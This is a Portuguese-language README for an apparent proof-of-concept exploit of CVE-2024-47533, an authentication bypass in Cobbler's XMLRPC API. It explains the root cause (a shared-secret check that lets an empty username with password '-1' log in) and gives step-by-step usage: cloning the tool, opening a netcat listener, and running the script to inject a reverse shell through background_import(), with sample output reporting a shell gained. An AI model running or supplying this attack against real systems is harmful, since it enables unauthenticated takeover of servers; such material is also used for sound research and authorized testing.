
Exploit de prova de conceito para CVE-2024-47533, um bypass de autenticação não autenticado na API XMLRPC do Cobbler levando a execução remota de código via shell reverso injetado.
Este repositório contém um exploit de Prova de Conceito (PoC) para CVE-2024-47533,
um bypass crítico de autenticação na API XMLRPC do Cobbler que leva a execução remota de código (RCE) não autenticada.
O exploit explora a falha do método login() da API XMLRPC para contornar a autenticação e injetar um comando reverse shell via background_import().
Esta ferramenta é destinada apenas para fins educacionais, de pesquisa e testes de penetração autorizados.
NÃO a utilize em sistemas que você não possui ou para os quais não tem permissão explícita por escrito para testar.
O autor não assume nenhuma responsabilidade por uso indevido ou danos.
Causa Raiz:
utils.get_shared_secret() retorna incorretamente -1 devido ao tratamento inadequado de leituras de arquivos em modo binário com uma codificação, permitindo autenticação com um nome de usuário vazio e -1 como senha.
Impacto:
Um atacante pode:
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
Na sua máquina atacante:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
Exemplo:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # Script de exploit reverse shell
└── README.md # Documentação
[*] Alvo: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Conectando ao Cobbler...
[*] Autenticando...
[*] Executando exploit...
[+] Exploit enviado! Consegui um Shell 🔥.
00xCanelo
Perfil no GitHub